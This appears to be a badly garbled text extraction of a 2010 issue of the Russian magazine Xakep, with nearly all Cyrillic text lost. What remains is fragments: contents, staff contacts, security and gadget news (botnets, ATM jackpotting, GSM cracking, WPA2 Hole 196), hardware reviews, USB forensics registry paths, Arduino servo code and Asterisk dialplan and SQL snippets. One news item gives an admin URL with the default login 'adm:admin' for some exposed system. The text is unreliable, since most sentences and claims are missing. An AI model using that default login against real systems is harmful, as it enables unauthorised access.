Вы находитесь на странице: 1из 148

.

48

x 10 () 2010

.
210
:

10 (141) 2010

AOL/ AOL

AOL

CALLBACK:


. 34


AOL
. 66

141

METASPLOIT FRAMEWORK
-

LINUX

SALITY.AA

VPN-

HITB

HACK IN THE BOX



. 54

INTRO


Chaos Constructions:
. ,

IT, , ,
: ,
. CC
,

.
, :

. :
, CC
, ,
-
Defcon BlackHat, , , HITB :).
nikitozz,
. .
udalite.livejournal.com
http://vkontakte.ru/club10933209
* ? 3D ,
EligoVision.
: DVD
www.xakep.ru/3dmarkers/ Windows
Linux, web- ,

.
EligoVision 3d-
www.eligovision.ru.

CONTENT
MegaNews

004

080

FERRUM
016

018

BBK

020

AMD

ASUS U43Jc

HD-

DDR3

PC_ZONE
025

026

030

034

HiAsm

Arduino

Callback

038

Easy-Hack

042

048

054

HITB

060

Metasploit Framework

066

AOL

070

X-Tools

MSF

AOL

MALWARE
072

- :

076

][-: Sality.aa

Nod32, Avast, Avira:

Parallels

086

092

100

098

103

VPN

Linux,

Linux

LUKS/dm-crypt, TrueCrypt EncFS

VPN-

108

Python -

112

WTF WCF?

116

MSN-

119

Windows Communication Foundation:


-

IM-

: ( )

SYN/ACK
122

126

AD CS?

130

SET

IT-


LiveDVD/LiveUSB

Certificate Services Windows Server 2008 R2 vs.


Windows Srver 2003

134

PSYCHO:

140

FAQ UNITED

143

144

WWW2

, : , ,
?

FAQ

8.5

web-

066

AOL

030

Arduino

108

054

Python -

HITB

>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>

Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
, MALWARE SYN/ACK
Dr. Klouniz
(alexander@real.xakep.ru)
UNIXOID PSYCHO
Andrushock
(andrushock@real.xakep.ru)
>

> xakep.ru
(xa@real.xakep.ru)

/ART

>-

(novikov.e@gameland.ru)
>

(svetlyh@gameland.ru)

/DVD

>
Step (step@real.xakep.ru)

> Unix-
Ant
>

/PUBLISHING
>
, 119021, , .
, . 11, . 44-45
.: +7 (495) 935-7034
: +7 (495) 780-8824
>

>

>

>

>

>

>PR-

>

>

>

/ .: (495) 935-7034, : (495) 780-8824


> GAMES & DIGITAL
(goryacheva@gameland.ru)

>



> Gameland TV

(rumyantseva@gameland.ru)
>
(strekneva@gameland.ru)
>

>


>
(ashomko@gameland.ru)
> -
(alekseeva@gameland.ru)

>

(korenfeld@gameland.ru)
>


/:

/ .: (495) 935-4034, : (495) 780-8824


>
(kosheleva@gameland.ru)
>

(goncharova@gameland.ru)
>
(lukicheva@gameland.ru)

> :

,
: claim@gameland.ru.
>
.: 8 (800) 200.3.999

>
101000, ,
, / 652,

,

77-11802 14
2002 .

Lietuvas Rivas, .
100 000 .
.

. :

. ,

,
.
.


.
.

:
content@gameland.ru
, , 2010

MEGANEWS

MIFRILL

MARIA.NEFEDOVA@GLC.RU

MEGANEWS

ETHERNET WI-FI

,
,
, ,
, , .
,
, .
Wi-Fi?
:
, ,
.
Netgear
Universal WiFi Internet Adapter (WNCE2001).
-
Ethernet- Wi-Fi 802.11n,

. WNCE2001

Ethernet
, Wi-Fi Protected Setup
( WPS
, ). Netgear ,
, , USB.
Netgear Push N Connect
plug-and-play.

2000 .

,
Verdana .

WIKILEAKS
, WikiLeaks
(
,
),
. ,
,
.
WikiLeaks,
. ?
, :). , , . , , (
, , , )
, , .
WikiLeaks . , ,
e-mail Dagens Nyheter, ,
. , , , .

004

X 10 /141/ 10

MEGANEWS



(The U.S. Copyright Office)

,
.
,
.
:
- ,
,
;
- ,
, ,
;
- DVD-,
,
, ,
;
- (DRM)
;
- , , ,
.
, Jailbreak

iPhone ,
DVD . Apple, , , ,
, ,

, Apple .
, ,
, .
,
Apple ,
( ),
.
, , ,
(
SMS, e-mail
).
,
, ,
Jailbreak

.

SMS- Android OS.


Trojan-SMS.AndroidOS.FakePlayer.

(Butterfly)
. ,
-, Mariposa,
.
,

. , ,
Butterfly ( )
$5001.300.
: ,

Butterfly-,
23- Iserdo (
).
,
. ,
, : -

006

, , , ,

. , ,

Iserdo, .

X 10 /141/ 10

MEGANEWS


,
. Brazilian Banker,
, ,
,
RSAs FraudAction Research Lab ,
.
( , ,
Orkut).

Ana Maria,

. ,
,
, EIOWJE.
,
.
,

.

$88,5
427.393

,
., Blizzard
, WoW.


.

$200


-
Black Hat , ,
, .
Black Hat
, ...
Tranax Technologies
Triton . ,
,
. ,

,
. Tranax Technologies ,
Dillinger.
Dillinger

. Triton, ,
Scrooge (
). ,
Triton ( ) ,
10 .

, .

; Triton
, Tranax Technologies
. , Tranax
ATM, .

KINDLE , ,
Amazon : Kindle DX
Kindle .
: Kindle Wi-Fi Kindle 3G + Wi-Fi.
6- 600x800 . Amazon
,
50%
( 10:1 6:1),
.
, .

21%, 17%.

008

190x122x8 , 241
. - , - ,
4 ( ,
3.500 ), 20%.
:
Kindle PDF WebKit.
,
,
$139 Wi-Fi $189 3G + Wi-Fi
. ,
Nook.
X 10 /141/ 10

>> coding

lotus.xakep.ru

X-testing ontest
-
IBM Lotus Symphony 3.
Lotusphere 2011 !

,
Lotus Symphony Beta 3
lotus.xakep.ru. :
,
!

MEGANEWS

GSM-
,
, RC4, Skype.
,
.
Black Hat
Kraken, A5/1,
GSM-, AirProbe,
SMS. ,
A5/1 ,
, . , Kraken ,
, SMS
, 30 .
Kraken
1,7 ,
( , ).
:

GSM-
-; ,
Wi-Fi-

Wi-Fi. Wi-Fi WPA
, , GSM .
, Kraken, AirProbe, , ,
.
, , ,
,
.
, , , ,
, ,
,
- ( Wi-Fi- ). ,
-

Kraken
Airprobe. , , , ,
. ,
Defcon
( $1.500)
GSM-.
, ,

:
- AT&T,

.

TOSHIBA
Toshiba
.

Wipe (, ). Wipe ,
,

,
.

Toshiba (Self-Encrypting Drive, SED),


. ?
: HDD , - ,
, , ,
.
, ,
HDD .

BitDefender , 75%
.

PS3
psx-scene.com
ozmodchips.com , PlayStation 3 -
. PS Jailbreak, USB-,
, .
PSX Scene ( ), , debug- PS3.
, ,
PS Jailbreak. , psjailbreak.com,
, FAT- SLIM-
. : $130 .
, , , .
Sony , ,
, , ,
PS3 . !
:).

010

X 10 /141/ 10

PLAY FAST,
LEVEL UP

DVD
,

PlayFast.


. ,
,

. ,
,
. ,
. ,
, . -
Digital Solutions
.
. - ,
Starcraft .
:
. ?
, ,
. , .
torrent, ( ). , 5-10%, ,
Starcraft II .
:).
- . ,
, .
-
Apple.TV, :
HD- .
: ,
.
Steam Xbox Live Marketplace, , ,
,
.
: 20-30 ,
.
,
.
, , 8 . (
8-10 ), .
X 10 /141/ 10

, ....
Digital Solutions . ,
PlayFast (www.playfast.ru),
. ,
, .
.
, ,
. : - PlayFast , ,
. ,
.
PlayFast . ,
, .
, ,
. : 20-30
, .
. , , ,
.
:
, , .
.
, . ,
. ? : , .

011

MEGANEWS

BLU-RAY
, , ,
-.
. 68240
,

CD, DVD,
Blu-ray ..

. , 27

200 ,
, , 45 .
.

- :

25 , 50 . 26 /,
36 /.
120 ,
1,2 ,
. ? ,
Blu-Ray.
Blu-Ray ,
, ,

60 .


LOGITECH


,

.
,
, .
Logitech Wireless Illuminated Keyboard K800
Logitech , .

(
) ,

.
Logitech ,
10 (,

mirco-USB). Logitech
Unifying, Logitech
Advanced 2.4 GHz .
PerfectStroke,
, Incurve Keys .
,
100 .

19 54 Virus

Bulletin, VB100.
Kingsoft Bkis BKAV.

CHROME OS TABLET
Chrome OS. downloadsquad.
com, ,
, ,
, HTC
Chrome OS Tablet.
, HTC
Nexus One, ,
, .
DownloadSquad

,

012

Verizon 26 ! DownloadSquad
,
, ,

,
.
, : Google Verizon .
Engadget
DownloadSquad

, . , Chrome OS
2011
.
X 10 /141/ 10

ANDROID- LG

ANDROID

LG
Android 1.6
LG Optimus (GT540). -
: !
- 3.0 Android ,
.
:
8.990 .
,
Android-
:).
Qualcomm
MSM7227 600 , 200
TFT- 3.0 (320x480).
microUSB, Wi-Fi,
Bluetooth 2.1+EDR (A2DP), FM- microSD (2
, 32 ).

: 3
,
. Android
, , , .


(Justin Case)

Android Licensing Service,

Android-
.
Licensing Service


Google ,

.

- ,

,

( ).
,
,

.


www.androidpolice.com , Google
.

: Intel
McAfee ,
, $7,68 .

WPA2
, AirTight Networks, Wi-Fi-
WPA2. , Hope 196, , IEEE802.11
(Revision, 2007). : WPA2-
: Pairwise Transient Key (PTK), ,
, Group Temporal Key (GTK),

-. , PTK
, GTK . , Hole 196,
, GTK
196 IEEE 802.11! -,
. Man-in-themiddle , Wi-Fi-,
, ,
.
, , MAC-. , ,
,
, WPA2 .
: www.airtightnetworks.com/wpa2-hole196
X 10 /141/ 10

013

MEGANEWS

CARDERPLANET
carderplanet.com (CC
2004 ),

. 27-
,
.
, BadB,
. , BadB
CC
.

, .
.
. ,
, BadB

,
.
, ,

.

10 250
,
2 ,
250 .

WI-FI-
Parrot
AR.Drone, iPhone,
. ,
, .
, www.rabbit-hole.org, :). ,

Wi-Fi-! -23,
Via Epia Pico ITX PC (500 Via C7, 1 RAM Backtrack 4 )
ArduPilot.

, PPP over SSH .
ArduStation, . Edge/3G
, ,
. WASP (Wi-Fi Aerial Surveillance Platform) 30-45 , ,
, 7 . , ,
, GPS-, ,

, ,
. ?
?. , Google
Microdrones.

. Google Earth Google Maps.

Harris Interactive , , ,
49% 52%
.

IPAD
iPad
Shenzhen Paoluy Silicone Technology. BL-BKB76,
,
, (Bluetooth) QWERTY- iPad .
.
Apple
-, 4-4,5
.
100 ,
90 .
, $90.

014

X 10 /141/ 10


, , ,
, .

,

, rsnet.ru. ,
,
, : https://[ip]/cgi-bin/main.scm,
adm:admin. , , ,
-
() - ,
, SMS . , ,
.
,
, , , . ,
, ,

(
).

.

Avast $100 .
Summit Partners.
- freemium.

X 10 /141/ 10

015

FERRUM

-
ASUS U43Jc

, ASUS
Bamboo,
:
, ,
, .

ASUS U43Jc .


:
!
.
,
: -

016

.
: ASUS
,
, ,
.
ASUS ,

:
,
!
.
, : 14
.
X 10 /141/ 10

: Intel Core i7-620M 2,66


: Mobile Intel HM55 Express Chipset
: 4 DDR3 1066 SDRAM
: 14", , 16:9, 1366x768, LED-
: NVIDIA GeForce 310M, 1 DDR3 VRAM
: 640, 5400 /
: 5--1 (SD,MMC,MS,MS-Pro,XD); Mic; Headphone; VGA/Mini D-sub; USB 3.0; 2xUSB 2.0; RJ45; HDMI
: 34.4 x 24.1 x 2.20~3.18 , 2.14
DVD Super Multi


ASUS Crosslink , - .

DVD- ,

. USB, ( Windows MAC)
4 .

USB- ASUS CineVibe


,
. ,
, , . ,
CS Source ,
:).

ASUS VECTOR BACKPACK


. /
, , :
.
,
, . 16 .

, : LED- 1366x768 , HD-


.
, .
.

ASUS . , ,

. , ,

, .
, .

ASUS U43Jc :
Intel Core i7-620M
X 10 /141/ 10

2,66 Intel Turbo Boost, 3.33 , ,


, .
NVIDIA GeForce 310M 1 DDR3 VRAM. ,
Intel Core i5 GMA
HD.
NVIDIA
Optimus, ,
.
, HDMI-, USB, USB 3.0.
ASUS Super Hybrid Engine (SHE), ,
.
,
: , ASUS U43Jc
10.5 !

U43Jc ASUS Bamboo Series :


U33Jc ( 13.3) U53Jc (15.6).
: ,
U33Jc .
, ASUS U43Jc .
: , 14.
,
.
. , : 10.5 ASUS.

ASUS
trendclub.ru. Trend Club
, .
Trend Club , , . Trend
Club Intel ASUS
.

Intel, , , ,
.
Intel Web- Intel http://www.
intel.ru, http://blogs.intel.com.
Intel www.intel.ru/rating.

017

FERRUM

BBK
, , , , ? -
, .


HDTV Full HD.
1280720 19201080 -
. -
HD SD,
, : !
?! , ,
HD.
, ,
-
,
HDTV ,
4:3 .
,
.
,
HDTV-
BD- ,
,

, .
, ,
Blu-ray
.
, - ,
, , ,
,
, , .
-
.
,
.
,
HD- BBK,

.

018

MP050S
, ,
.
, MP050S -
,
, USB- ( FAT, FAT32 NTFS)
. ,
,
.
MP050S ,
USB-, ,
.
- , MP050S
, MKV
(Matroska) MOV (H.264).

2890 .


:
: HDMI 1.3, , , , USB 2.0,
SD/MMC/MS
:
- MPEG-1/2/4, MPEG-1/2 PS (M2P, MPG), MPEG-2, VOB, AVI, ASF,
WMV, MKV (Matroska), MOV (H.264), MP4
- AAC, M4A, MPEG audio (MP1, MP2, MPA), WAV, WMA
- JPEG HD, JPEG, BMP, PNG
- ISO, IFO
: 1080p
HDD :
:
: 121x26x101

X 10 /141/ 10

MP060S

MP070S

MP060S
.
HDTV ,
-
(BitTorrent HTTP).
, , ,
.
SATA- (
),
HD-.
, , , , . ,
, MP060S
- .

,
.
MP070S .
, MP070S, MP060S
, -
.
, ,
-
SATA 3.5". , 6080 , , ,
1.5 .

4690 .

3600 .

: LAN (Ethernet) 10/100 /


: HDMI 1.3, , , , , , USB 2.0, MiniUSB, SD/MMC/MS, eSATA Host
:
- MPEG-1/2/4, MPEG-1/2 PS (M2P, MPG), MPEG-2, VOB, AVI, ASF,
WMV, MKV (Matroska), MOV (H.264), MP4
- AAC, M4A, MPEG audio (MP1, MP2, MPA), WAV, WMA
- JPEG HD, JPEG, BMP, PNG
- ISO, IFO
: 1080p
HDD :
:
: 134x195x125

: LAN (Ethernet) 10/100 /


: HDMI 1.3, , , , , , USB 2.0 2, MiniUSB, SD/MMC/MS, SATA Host
:
- MPEG-1/2/4, MPEG-1/2 PS (M2P, MPG), MPEG-2, VOB, AVI, ASF,
WMV, MKV (Matroska), MOV (H.264), MP4
- AC3 (Dolby Digital), DTS, WMA, WMA Pro, AAC, MP1, MP2, LPCM,
AAC, M4A, MPEG audio (MP1, MP2, MPA), WAV, WMA
- JPEG HD, JPEG, BMP, PNG
- ISO, IFO
: 1080p
HDD : ( 3.5
SATA)
:
: 210x51x162

X 10 /141/ 10

019

FERRUM

: ASUS Crosshair IV Formula


, : 2700, Athlon II X4 635
: MSI Radeon HD 4850
, : 700, FSP Blue Storm
: Windows 7 32-bit

AMD
DDR3

, , .
,
, , .
AMD, . ,
, ,
.
.

, AMD, , ,
, ,
. ,
, , 1800 .
FSB, . ,
,
,
, ,
( ) . , ,
, , , , , , . .

, ,
, , , .

, 1800
.
2000 ,
, , ,
, .

. , ,
,
. ,
(9-9-9-24) (1,65 ).

SuperPI , ,
, ,

; Everest, , , . PCMark Vantage,
,
. ,
WinRAR.

020

X 10 /141/ 10

2700 .

5700 .

APACER GIANT II
DK 02GAL F9QK2
:

, : 1024
, : 1800
: 9-9-9-27
, : 1,65
:

, . Apacer,
,
,
. .
(1980 ), , ,
, .
,
: . , , .

, , ,
, - 2 ? ,
Windows XP, .
. 1800 ,
9,
2200 .
.
X 10 /141/ 10

APACER GIANT II
DK 04GAS F1QK2
:

, : 2048
, : 2200
: 10-10-10-30
, : 1,65
:

Apacer
. - 4
Windows 7,
, . .
,
,
.

, . , AMD ,
Intel, ,
. , , ,
, .

021

FERRUM

7500 .

10300 .

CORSAIR DOMINATOR
GTX CMGTX2
:

, : 1024
, : 2250
: 8-8-8-24
, : 1,65
:

,
. - , , , ,
.
8-8-8-24 2250 .
, 1792 , ,
PCMark Vantage . , GTX
.

, . , , ,
.
.

022

KINGMAX HERCULES
FLKE85F-B8KJA FEIH
:

, : 2048
, : 2200
: 10-10-10-30
, : 1,5
:

4 , , ,
( ,
1,5 ) . , ,
AMD . , ,
Intel .

, , , . , (
7 /). , .

X 10 /141/ 10

7000 .

13000 .

KINGSTON HYPERX
KHX2000C8D3T1K2/4GX

KINGSTON HYPERX
KHX2133C8D3T1K2/4GX

, : 2048
, : 2000
: 8-8-8-24
, : 1,65
:

Kingston, ,
, ,
,
. , , WinRAR
, . HyperX
. ,
, . , 2000 8-8-8-24 ,

, , . Kingston, ,
.

, A M D , .
X 10 /141/ 10

, : 2048
, : 2133
: 8-8-8-24
, : 1,65
:

,
Kingston, , . , . , . ,
.
, 133
.

, AMD, 2133 , ( Kingston HyperX


KHX2000C8D3T1K2/4GX) .
,
.

K i n g st o n
H y p e r X K H X 2 0 0 0 C 8 D 3 T 1 K 2 / 4 GX , . A p a ce r G i a n t I I ( D K
0 2 GA L F 9 Q K 2 ) . z

023

FERRUM

PCMARK
Apacer Giant II (DK 02GAL F9QK2)
Apacer Giant II (DK 04GAS F1QK2)
Kingston KHX 2000 C8D3T1K2/4GX
Kingston KHX 2133 C8D3T1K2/4GX
Transcend TX2000 KLU-4GK
Kingmax Hercules
(FLKE85F-B8KJA FEIH
Corsair Dominator
GT CMGTx2(FLKE85F-B8KJA FEIH

500

1000

1500

2000

Apacer Giant II (DK 02GAL F9QK2)


Apacer Giant II (DK 04GAS F1QK2)
Kingston KHX 2000 C8D3T1K2/4GX
Kingston KHX 2133 C8D3T1K2/4GX
Transcend TX2000 KLU-4GK
Kingmax Hercules
(FLKE85F-B8KJA FEIH
Corsair Dominator
GT CMGTx2(FLKE85F-B8KJA FEIH

0 500 1000 1500 2000 2500 3000 3500 4000 4500


Apacer

, ,

SUPERPI

WINRAR

Apacer Giant II (DK 02GAL F9QK2)


Apacer Giant II (DK 04GAS F1QK2)
Kingston KHX 2000 C8D3T1K2/4GX
Kingston KHX 2133 C8D3T1K2/4GX
Transcend TX2000 KLU-4GK
Kingmax Hercules
(FLKE85F-B8KJA FEIH
Corsair Dominator
GT CMGTx2(FLKE85F-B8KJA FEIH

Apacer Giant II (DK 02GAL F9QK2)


Apacer Giant II (DK 04GAS F1QK2)
Kingston KHX 2000 C8D3T1K2/4GX
Kingston KHX 2133 C8D3T1K2/4GX
Transcend TX2000 KLU-4GK
Kingmax Hercules
(FLKE85F-B8KJA FEIH
Corsair Dominator
GT CMGTx2(FLKE85F-B8KJA FEIH

10

15

20

25

30

,
Transcend !

500

EVEREST,

Apacer Giant II (DK 02GAL F9QK2)


Apacer Giant II (DK 04GAS F1QK2)
Kingston KHX 2000 C8D3T1K2/4GX
Kingston KHX 2133 C8D3T1K2/4GX
Transcend TX2000 KLU-4GK
Kingmax Hercules
(FLKE85F-B8KJA FEIH
Corsair Dominator
GT CMGTx2(FLKE85F-B8KJA FEIH

Apacer Giant II (DK 02GAL F9QK2)


Apacer Giant II (DK 04GAS F1QK2)
Kingston KHX 2000 C8D3T1K2/4GX
Kingston KHX 2133 C8D3T1K2/4GX
Transcend TX2000 KLU-4GK
Kingmax Hercules
(FLKE85F-B8KJA FEIH
Corsair Dominator
GT CMGTx2(FLKE85F-B8KJA FEIH

10

15

20

25 30 35 40 45 50

2500

2000

4000

6000

8000

10000

12000


5%

Apacer Giant II (DK 02GAL F9QK2)


Apacer Giant II (DK 04GAS F1QK2)
Kingston KHX 2000 C8D3T1K2/4GX
Kingston KHX 2133 C8D3T1K2/4GX
Transcend TX2000 KLU-4GK
Kingmax Hercules
(FLKE85F-B8KJA FEIH
Corsair Dominator
GT CMGTx2(FLKE85F-B8KJA FEIH
0

2000

4000

6000

8000

Apacer, Corsair Kingston

024

2000

EVEREST,

EVEREST,
Apacer Giant II (DK 02GAL F9QK2)
Apacer Giant II (DK 04GAS F1QK2)
Kingston KHX 2000 C8D3T1K2/4GX
Kingston KHX 2133 C8D3T1K2/4GX
Transcend TX2000 KLU-4GK
Kingmax Hercules
(FLKE85F-B8KJA FEIH
Corsair Dominator
GT CMGTx2(FLKE85F-B8KJA FEIH

1500

, ,
3%

,
,

1000

10000

12000

0 1000 2000 3000 4000 5000 6000 7000 8000


X 10 /141/ 10

PC_ZONE
Step twitter.com/stepah


,
. forensics.
#100 ][
:
, ,
,
- .
forensic
,
, , history
-,
- .
, ,
,
.
,
,
.
, - ,
.
, .

USB- -
USB-, , .
,
,
. ,
,
, .
,
- . ,
forensic,
.
Windows.
, ,
,
.
. , ,
.

,
. ,

025

usbHistory

.
, ,
. PnP
,
USB- USB Driver
USBSTOR.SYS.
(MountMgr.sys),

,
. ,
,
.

.
: HKLM\
SYSTEM\CurrentControlSet\Enum\USBSTOR.
, -
,
. , ,
.
,
,
,
, .
. HKEY_
LOCAL_MACHINE\SYSTEM\CurrentControlSet\
Control\DeviceClasses\{53f56307-b6bf-11d094f2-00a0c91efb8b}
.
, (
), Control,

.

Windows
Forensic Analysis (Harlan Carvey),
.
, usbHistory (sourceforge.net/
projects/usbhistory).
,
,
:
USB History Dump
by nabiy (c)2008
(1) --- USB Device
instanceID: 1001178901b3f6&0
ParentIdPrefix:
Driver:{4d36e967-e325-11ce-bfc108002be10318}\0032
Disk Stamp: 03/28/2010 18:10
olume Stamp: 11/03/2009 17:26
(2) --- USB Flash Drive USB
Device
[..]

.

.
,
,
,
.
, .
. z
X 10 /141/ 10

PC_ZONE
Dilma support@hiasm.com


HiAsm

, -
. ,
,
. .

- . ,
,
.
, : Basic, Pascal, C .
, () ,
,
Delphi C++.
, . ,
,
LabView, HiAsm, SoftWire .
? .

HIASM

HiAsm ,
, ,
. , -
(, , , , ..

026

..). ( )
(
,
). , .
,
( , ,
, ,
, ).
,
( ) .
,
Hello world!,
. , , .
: (Button)
(Message), (
)
Message ( Hello world!).
, , , HiAsm:
Make(delphi)
Add(MainForm,2953706,21,105)
{
X 10 /141/ 10

}
Add(Button,147563,189,105)
{
Left=180
Top=110
link(onClick,5363509:doMessage,[])
}
Add(Message,5363509,238,105)
{
Message="Hello world!!!"
}

Object Pascal,
. , HiAsm
.
.

Windows, Object Pascal
FPC Delphi.
:
PocketPC C++ MS ARM Microsoft Windows Mobile;
WEB PHP JavaScript HTML;
QT C++ Windows, Linux MacOS;
VBS Basic Windows .
just for fun online- HiAsm (hion.
hiasm.com), ,
.

Windows ( hiasm.
com 4.4)
ab apache-tools.
-
URL , .
100 http://ya.ru
, . , .
,
.
HiAsm : ...,
Windows Windows.
.

, ,
. ,
TCP
. TCP-.
X 10 /141/ 10

HTTP- 80, IP ya.ru 93.158.134.3.


, .
. Strings
HTTP- :
GET / HTTP/1.1
Host: ya.ru
Connection: close
< >
< >

,
. ,
.
(Hub),
,
. ,
,
HTTP/1.1 200 OK.
,
:
onClick ( );
doEvent1 ;
, , onEvent1 onEvent2;
onEvent1,
doOpen TCP-.
ya.ru 80 ;
, ,
, onEvent2;
, , doSend TCP.
Data, .
Text
, , , , , ;
, , TCP-
onRead;
onRead doAdd ,
.
, , .

, . ,
Data
, .
onClick , -

027

PC_ZONE

( 1)
, , doSend.

, ,
- .
, ,
.

.
.
, , .
(onClick doStart onStart
doEvent1), doStop onDisconnect
TCP-. ,
,
onDisconnect, . ( ,
doStart doStop)
onStop.
, , ,
(
). ,
. , .
,
100 .
onDisconnect
,
. , . ,
,
, . onDisconnect,
100. 100,
,
. ,
. Op1
Result,
, , onDisconnect.
: x = x + 1.

onResult, doCompare
. 100,
:

028


( 2)

if(x < 100)


[ doEvent1 ]
else
[ doStop ]

, , doClear
. doClear
onDisconnect
,
.
,
,
onStart doEvent1 .

, ,
.
, (
onDisconnect, )


,
.
:
(Hub) .
-(DoData)
.
(Memory)
.
:
(Math) .
(If_else)
.
(For)
, .
-> (Timer)
.
-> (Debug) ,
.

X 10 /141/ 10


( 3)
INFO
HiAsm

.
-
. ,
, .

, . , HiAsm ( , ,
) - . HiAsm
, , ,

. :).
(,

), HiAsm
,
. , ,
( ) , .
, ,
. ,

, ,
, ,
, .
,

.
-
, 10
, .

, , ,
X 10 /141/ 10

. , , ,

.
,
, , ,
. - ,

, . ,
,
, ,
,
.

Windows ( )
,
.

HiAsm
. , ,
, ,
, .
, ,
HiAsm.
,
(
, ..),
(, , )

- .
, - . : ,
500-1000 ,
.
,
: , ,
HiAsm 7000 .z

info
HiAsm (
)
,
,
dilma ( ,
), nesco ( ), iarspider
( ), nic
( )
.

,
,


.

HTTP://WWW
links
HiAsm:
hi-asm.blogspot.com

:
my-hiasm.net.ru
HiAsm online:
hion.hiasm.co

029

PC_ZONE
noonv13@gmail.com

-


Arduino

,
,
. , , - , ,
. ,
, Arduino .

.
, . , - ,
, , , - . ,
,
. Arduino. , ,
. -,

. ?

ARDUINO?

, Arduino, /
Wiring. , C++,
.
Arduino ATmega328 ATmega168

030


.
5 16
, (). .
. (), , , ( ) Arduino IDE . ?, . : ()
.
( AVR) ( ),
(7 LPT- ) (
). ,
- (, , ).
: Arduino .
USB-. ,
Arduino !
Arduino 9-12
(
X 10 /141/ 10

$5
Arduino

Arduino -

, ), USB- .
, ,
USB- A-B,
.

.
. Arduino /
. 14 /
. ,
, .. - . , Arduino 0
1.
5 . , .

. , - , . . Arduino
Arduino IDE, Wiring ( , C++),
AVR WinAVR.
C.
Arduino , .
, ,
. Arduino
Arduino (www.arduino.cc). , Arduino
. Arduino
, - (
duino): , Freeduino, Seeduino CraftDuino. Arduino
, , Linuxcenter (www.linuxcenter.ru/shop/embedded/
arduino) , , -
- (, www.sparkfun.com). $30.

, Arduino
.

, . , , /
.. , Arduino
- (, ),
. , Ethernet- Arduino X 10 /141/ 10

( ). GSM-
, GPS- GPS-,
Wi-Fi- ..

. , Arduino

, . - Arduino!
Twitter? ? ! , ,
, ,
Arduino.
, .

, .
- Arduino. .
.
. ,
Arduino, , (
). ? , , , ( 40
).
.
, . , Arduino
( ).
L293D (
Motor- , ).
.
.
-,
. , ,
, Arduino . ,
( ) ,
SG-90 USB.
-
$5 .

, , ,
, .
- .

.
, ,
( ).
( ),
, - ,
. :

031

PC_ZONE

OpenCV -

(/),
+5 (),
(//).
, .
,
.
.
, .
, Arduino IDE
Servo (www.arduino.cc/en/
Reference/Servo). , 0 180 :
#include <Servo.h>
Servo myservo; //
// 8
int pos = 0;
//
void setup()
{
myservo.attach(9); //
}
void loop()
{
for(pos = 0; pos < 180; pos += 1)
// 0 180
{
// 1
myservo.write(pos);
//
delay(15);
// 15
}
//
for(pos = 180; pos>=1; pos-=1)
// 180 0
{
myservo.write(pos);
delay(15);
}
}

ARDUINO

, , . -,
() .
. , ,

032


. . Arduino
( CraftDuino) , .
,
. :).
, : Arduino,
.
. Arduino . ,
Servo (
Arduino IDE).
,
Firmata, , Servo,
Arduino IDE. Firmata ,

Arduino . Arduino,
:
#include <Firmata.h>
#include <Servo.h>
Servo servo7; // Servo
Servo servo8; //
// ,
Firmata
void analogWriteCallback(byte pin, int value)
{
if(pin == 7)
servo7.write(value);
// value
if(pin == 8)
servo8.write(value);
}
void setup()
{
//
Firmata.setFirmwareVersion(0, 2);
// -
Firmata.attach(ANALOG_MESSAGE, analogWriteCallback);
servo7.attach(7);
//
servo8.attach(8);
Firmata.begin(9600);
// Firmata
X 10 /141/ 10

DVD
dvd
Arduino
++
.

(robocraft.ru/files/
opencv/servobot/
servobot.zip).

HTTP://WWW

void loop()
{
while(Firmata.available())
//
Firmata.processInput();
// -
}

links


Arduino.
Arduino IDE,
Tools Board, ,
(Tools Serial Port),
.
Done compiling.
Arduino,
. , Done
uploadling., !
-.

, ++.
web-cam-
,
OpenCV (sourceforge.net/projects/opencvlibrary).
,
Intel (
). , OpenCV
,
.
, .
: -
, .
, .
- ,
( 90
). rotate(), X 10 /141/ 10

-
OpenCV: cvWarpAffine(),
. ,
-,

:
//
int A = 0;
int Amax = 180;
//
int F = 0;
int Fmax = 180;
IplImage* dest = 0;
//
// -
//
void myTrackbarA(int pos) {
A = pos;
// Firmata
char buf[3];
buf[0] = 0xE0 | 7;
buf[1] = A & 0x7F;
buf[2] = (A >> 7) & 0x7F;
sg.Send(buf, 3);
Sleep(100);
}


Arduino:
www.arduino.cc
:
robocraft.ru/blog/
computervision
WinAVR:
sourceforge.net/
projects/winavr
Arduino :
community.
livejournal.com/
ru_arduino

, , . .
, , . , , !
! ,
. -
.
, , , Arduino
. , ? ,
. z

033

PC_ZONE
Aggressor


Callback
IP-.
, , -
Skype-, Wi-Fi 3G.
,
callback, VoIP
. , , VoIP-.

callback VoIP. , ,
,
. - ,
-. - ,
.
. : ,
, .
PIN- ( )
, .
, callback.
.

-
, ,
. , ,
Asterisk. , Asterisk . , ,

034

. PDF- ,
(www.xakep.ru/magazine/xa/107/152/1.asp www.
xakep.ru/magazine/xa/108/154/1.asp).
TrixBox, Elastix ..;
. , , . , , Asterisk . ,
Asterisk
, SIP. .
, , SIP-, , . VoIP FXO-, :
Caller ID,
. ,
. SIP-, ,
. ( )
VoIP-, .
, ,
. . .
, Asterisk VoIP-GSM , :
5000 .
X 10 /141/ 10

SIM- SIM Dialer

MySQL
3G-, 1000 . SIM Dialer,
, ,
callback- .
, SIM- ( ).

, , Asterisk
, .
, .
/etc/asterisk/extensions.conf (
,
) , : [fromgorod].
, ,
, (IVR),
PIN-, .
310309:
[fromgorod]
exten => 310309,1,NoOp(zvonyat s nomera
${CALLERID(all)})
exten => 310309,n,NoOp(${STRFTIME(${EPOCH},,%d.%m.%Y%H:%M:%S)})
exten => 310309,n,GoToIf($["${CALLERID(number)}" =
"8901234567"]?ivr,s,1)
exten => 310309,n,Answer() ;
......

NoOp Asterisk
. Caller ID ,
. ,
. exten => 310309,n,GoToIf($["${CALLERID(
number)}" = "8901234567"]?ivr,s,1) , , . 8901234567,
IVR; ,
. ,
8 .
callback- ,
. , 50? . Asterisk
MySQL, CDR.
X 10 /141/ 10

Asterisk, CDR.
callback. mysql -u asterisk -p asterisk, ,
.
(, PIN-, callback, )
:
CREATE TABLE 'callback' (
'phone' varchar(80) NOT NULL default '',
'pin' int(11) NOT NULL default '4321',
'callback' int(11) NOT NULL default '0',
'user' varchar(255) NOT NULL default ''
);
INSERT INTO callback(phone, pin, user)
values('8901234567', '2602',
'Aggressor');

, , Asterisk ? , [fromgorod]:
exten => 310309,1,NoOp(zvonyat s nomera
${CALLERID(all)})
exten => 310309,n,NoOp(${STRFTIME(${EPOCH},,%d.%m.%Y%H:%M:%S)})
exten => 310309,n,MYSQL(Connect connid localhost
asterisk asterisk asterisk)
